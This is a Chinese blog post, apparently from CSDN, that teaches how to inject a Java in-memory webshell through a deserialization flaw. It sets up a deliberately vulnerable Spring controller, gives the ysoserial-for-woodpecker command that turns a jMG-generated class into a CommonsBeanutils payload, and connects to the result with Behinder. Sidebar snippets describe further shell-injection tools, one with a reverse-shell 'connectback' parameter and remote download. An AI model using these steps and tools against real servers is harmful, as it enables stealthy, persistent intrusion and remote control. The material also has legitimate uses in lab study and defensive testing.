java反序列化漏洞注入内存马

已于 2025-03-09 13:52:08 修改
阅读量1.1k 收藏 10
点赞数 14
CC 4.0 BY-SA版权
文章标签: java 开发语言
于 2025-03-09 13:51:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/moonteam/article/details/146131512

一、简介

jMG (Java Memshell Generator) 是一款支持高度自定义的 java 内存马生成工具,可作为 woodpecker 的插件使用,提供常见中间件的内存马注入支持。

功能介绍

  • 支持的中间件 (Tomcat/Resin/Jetty/WebLogic/WebSphere/Undertow/GlassFish/Spring)
  • 支持的网站管理工具 (Behinder/Godzilla/Custom)
  • 支持的内存马类型 (Filter/Listener/Interceptor)
  • 支持的输出格式 (BASE64/BCEL/CLASS/JS/JSP/JAR/BIGINTEGER)
  • 支持的辅助模块 (探测目标中间件/序列化数据封装)

模块划分
 

  • 内存马生成模块
    • Behinder、Godzilla
    • Custom
      • 注入自定义的Filter和Listener,常见场景:其他网站管理工具的服务端、内存代理、内存水坑等
  • 辅助模块
    • ServerType Detector 中间件探测器
      • 探测中间件信息,常见场景:SpringBoot Fatjar
      • 提供 4 种方式判断目标中间件 (DFSEcho/Sleep/DNSLog/HTTPLog)
    • Ysoserial Payload Generator
      • 基于 ysoserial-for-woodpecker 对反序列化漏洞利用提供支持、提高漏洞利用效率

参数说明
 

参数名称

参数说明

其他

server_type

选择中间件的类型


 

shell_type

选择内存马的类型


 

gadget_type

选择利用链的类型

根据gadget自动完成对class的特殊处理,如继承类、实现接口、添加注解

format_type

输出格式


 

更多参数 - 参数自定义

从 github 仓库下载 jMG.jar 并放在 woodpecker 的 plugin 子目录下即可

下载的地址 https://github.com/pen4uin/java-memshell-generator/

二.中间件覆盖情况


 

godzilla-listener

godzilla-filter

behinder-listener

behinder-filter

tomcat 9.0.39

tomcat 8.5.53

tomcat 7.0.59

tomcat 6.0.48

tomcat 5.5.36

jetty 9.4.43

jetty 8.2.0

jetty 7.6.0

resin 4.0.66

resin 3.1.15

weblogic 10.3.6

weblogic 12.1.3

websphere 8.5.5

websphere 9.0.0

注:以上测试结果仅供参考

三、单独使用工具

也可以直接使用这个工具  

使用jdk8打开工具

"C:\Program Files\Java\jdk1.8.0_202\bin\java.exe" -jar jmg-all-1.0.9_250101.jar gui

四、注入内存马

1.启动靶场 这份代码存在反序列化漏洞

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.ResponseBody;

import javax.servlet.http.HttpServletRequest;
import java.io.ObjectInputStream;

@Controller
public class Deserilizer {
    @ResponseBody
    @RequestMapping("/deser")
    public String deser(HttpServletRequest request) throws Exception {

        try {
            new ObjectInputStream(request.getInputStream()).readObject();
            return "Deserilizer successful";
        }catch(Exception e) {

            return "Deserilizer failed"+e.getMessage();
        }

    }
}

2.检测利用链

使用yakit的检测反序列化利用链

查看dnslog存在的 CommonsBeanutils1_183 链子 

使用jmg生成内存马

请把jdk_abstractranslet勾上

接着使用 ysoserial-for-woodpecker-0.5.2.jar 反序列化利用利用生成payload

下载地址 https://github.com/woodpecker-framework/ysoserial-for-woodpecker

java -jar ysoserial-for-woodpecker-0.5.2.jar -g CommonsBeanutils2_183 -a "class_file:C:\Users\moon\Documents\SerializationUtil.class" >ser.bin

使用yakit将生成的ser.bin进行提交

使用Behinder链接 填写对应的连接密码和信息

下载地址 https://github.com/rebeyond/Behinder/

连接成功

参考文章 

https://mp.weixin.qq.com/s/oAiGWY9ABhn2o148snA_sg

想系统学习渗透测试?扫码报名培训课程!

暗月安全
关注
Java反序列化注入内存
02-09 2757
Java内存总体有Servlet/Filter/Listern/Java-Agent四种,前三种思路都差不多,通过不同方式获取到ApplicationContext/servletContext/StandardContext等对象,然后往ApplicationContext/servletContext/StandardContext注入恶意的Servlet/Filter/Listern,这里通过注入 Filter实现内存。 实现一 通过Thread.currentThread().getContex
Java安全之反序列化回显与内存码,java程序设计项目化教程课后题答案
m0_63174420的博客
11-10 510
所以获取request的处理请求是 Connector—>AbstractProtocol$ConnectoinHandler—>global—>RequestInfo—>Request—>Response 而在Tomcat启动过程红会将Connector放入Service中。 而现在获取完成的流程是 StandardService—>Connector—>AbstractProtocol$ConnectoinHandler—>RequestGroupInf
如何通过反序列化进行打(非常详细)从零基础入门到精通,收藏这篇就够了
最新发布
Javachichi的博客
06-18 782
整个过程其实就是一个CC链的反序列化,然后我们通过ClassLoader将冰蝎的逻辑导入内存中,形成内存。是不是很简单?但威力却非常强大!
结合反序列化注入tomcat内存
白帽子凯哥哥的博客
05-24 1391
通过前几个内存的学习我们可以知道,将内存写在jsp文件上传并不是传统意义上的内存注入,jsp文件本质上就是一个servlet,servlet会编译成class文件,也会实现文件落地。借用木头师傅的一张图结合反序列化注入内存是动态注入内存的常用方法,然而通过反序列化注入的方式没有jsp文件的request内置类,所以获取回显的方式我们也需要考虑,在此写下这篇文章分析总结反序列化注入的方法细节。读者福利 |CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)
Java反序列化漏洞CC2利用链注入内存
道阻且长,行则将至
07-20 2235
本文从 0 到 1 介绍了 TemplatesImpl 链的基础原理,同时介绍其在 Fastjson 反序列化漏洞利用过程中的应用,最后介绍了 Java 反序列化漏洞 CC2 链中对 TemplatesImpl 链的集成,以及如何通过 CC2 链注入恶意类与 Java 内存
Java Agent 型内存调试系列 (二)——反序列化注入agent
热门推荐
leeezp的博客
10-28 30万+
实战中通过反序列化环境一步到位注入内存,相比于之前介绍的agent或filter内存需要上传文件到服务器,反序列化的好处是真正的无文件,只需要发一个包。
JAVA反序列化漏洞知识点整理
01-20
jenkins反序列漏洞跟过一遍之后,虽说梳理清楚了漏洞触发的大体流程,但是对于JAVA反序列化漏洞导致代码执行的原理仍旧不懂,因此有必要整理JAVA反序列化漏洞相关的知识点。  JAVA反序列化漏洞  反序列化漏洞的...
Java反序列化漏洞修复与安全防护
06-17
Java反序列化漏洞常见于以下几方面:一是不安全的反序列化库,像Apache Commons Collections等库在反序列化时缺乏足够安全检查,攻击者可构造恶意序列化对象触发漏洞,实现远程代码执行;二是未验证的数据源,若应用...
技术专栏 _ 深入理解JNDI注入Java反序列化漏洞利用.pdf
09-18
在深入探讨JNDI注入Java反序列化漏洞之前,我们需要对几个关键概念有所了解,这包括Java远程方法调用(RMI)、Java名称目录接口(JNDI)、Java远程消息交换协议(JRMP)、以及序列化和反序列化。 RMI是Java环境中...
Java反序列化漏洞利用工具的实现共5页.pdf.zip
11-23
Java反序列化漏洞是软件安全领域的一个重要话题,它源于Java平台中的一种设计特性,即对象可以在序列化后存储或在网络上传输,然后通过反序列化恢复为原来的对象状态。这种功能在分布式系统、持久化存储和网络通信中...
javaRMI反序列化漏洞验证工具
08-21
**Java RMI反序列化漏洞概述** Java RMI的反序列化漏洞主要源于不正确的类型检查和信任机制。当接收到未经验证的远程调用时,如果服务器没有正确地校验或限制输入数据,攻击者可以通过构造恶意序列化数据来操控远程...
shiro_attack:shiro反序列化进攻综合利用,包含(回显执行命令注入内存
03-11
shiro反序列化进攻综合利用 项目基于javafx,利用shiro反序列化扩展进行回显命令执行以及注入类别内存 检出唯一密钥(SimplePrincipalCollection)cbc / gcm Tomcat / Springboot回显命令执行 集成公用集合K1 / K2 通过POST请求中defineClass字节码实现注入内存(Servlet实现参考哥斯拉内存) resources目录下shiro_keys.txt可扩展键 关于内存 某些spring环境以jar包启动写shell麻烦 渗透中找目录很烦,经常出现各种写壳浪费时间问题 无落地文件舒服 错误修复 2020.11.08 高低版本base64库不一致,当前使用org.apache.shiro.codec.Base64避免此问题 2020.11.10 修复注入内存都显示注入成功的错误。 2020.11.23
memShell:一个Webshel​​l驻留在Java Web服务器的内存
05-10
记忆壳 一个Webshel​​l驻留在Java Web服务器的内存中 安装 解压缩memShell.zip cd memShell java -jar inject.jar 用法 anyurl?pass_the_world = pass //显示此帮助页面。 anyurl?pass_the_world = pass&model = exec&cmd = whoami //运行os命令。 anyurl?pass_the_world = pass&model = connectback&ip = 8.8.8.8&port = 51 //将Shell恢复为端口51上的8.8.8.8。 anyurl?pass_the_world = pass&model = urldownload&url = //直接通过受害者的网络下载远程文件。 anyurl?pass_the_world = p
[Java安全]—Tomcat反序列化注入回显内存
Sentiment的博客
12-03 1286
在之前学的tomcat filter、listener、servlet等内存中,其实并不算真正意义上的内存,因为Web服务器在编译jsp文件时生成了对应的class文件,因此进行了文件落地。所以本篇主要是针对于反序列化进行内存注入来达到无文件落地的目的,而的和可以直接获取,但是反序列化的时候却不能,所以回显问题便需要考虑其中。既然无法直接获取request和response变量,所以就需要找一个存储请求信息的变量,根据kingkk师傅的思路,在中找到了: 并且这两个变量是静态的,因此省去了获取对象实例
反序列化分析到shiro注入WebSocket内存
weixin_42508548的博客
01-30 1260
因为一直想要学习反序列化相关的内容,并且从反序列化延伸出来学习内存,所以花了很大一部分精力,从CC1到CB,整体地过了一遍反序列化利用链。在学习过程中,发现一个很有意思的内存,WebSocket内存,感觉如果用的好的话,挺符合实际需要的,所以自己大体利用了一下,很成功,在这里整理分享出来。
shiro 内存_GitHub - Veraxy01/Shiro-EXP: Apache Shiro 反序列化漏洞检测与利用工具,一键注入内存...
weixin_39639698的博客
12-22 1万+
项目介绍基于Apache Shiro反序列化漏洞进行利用链的探测,附内存。利用时需要修改POST请求两处数据,分别为Header头RememberMe字段值和携带的data数据(由于payload设定,data中须指定名字为c的参数值)。探测到利用链后,根据提示,将屏幕输出的payload粘贴至POST请求Header头RememberMe字段处,至于data携带的数据,自行决策,本文文末附内存...
Yso-Java Hack 进阶:利用反序列化漏洞内存
m0_61869253的博客
08-12 891
Yso-Java Hack 帮我们完成了很多需要代码操作的事情,而且支持自定义恶意类,可扩展性还是很强的,希望本篇文章可以给师傅们一些新思路,提高工作效率。Yso-Java Hack 帮我们完成了很多需要代码操作的事情,而且支持自定义恶意类,可扩展性还是很强的,希望本篇文章可以给师傅们一些新思路,提高工作效率。
用 Goby 通过反序列化漏洞一键打入内存【利用篇】_命令执行注入内存
2401_84931491的博客
05-13 771
在全部配置完成后,点击生成,就可以将生成的反序列化 payload 进行保存了。关于 Gadget、利用方式等相关信息的更多介绍,可以查看我开源项目的 ReadMe 或源代码。
用 Goby 通过反序列化漏洞一键打入内存【利用篇】
m0_46699477的博客
01-16 1251
Goby 使用者无需任何配置,就可以一键打入内存
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值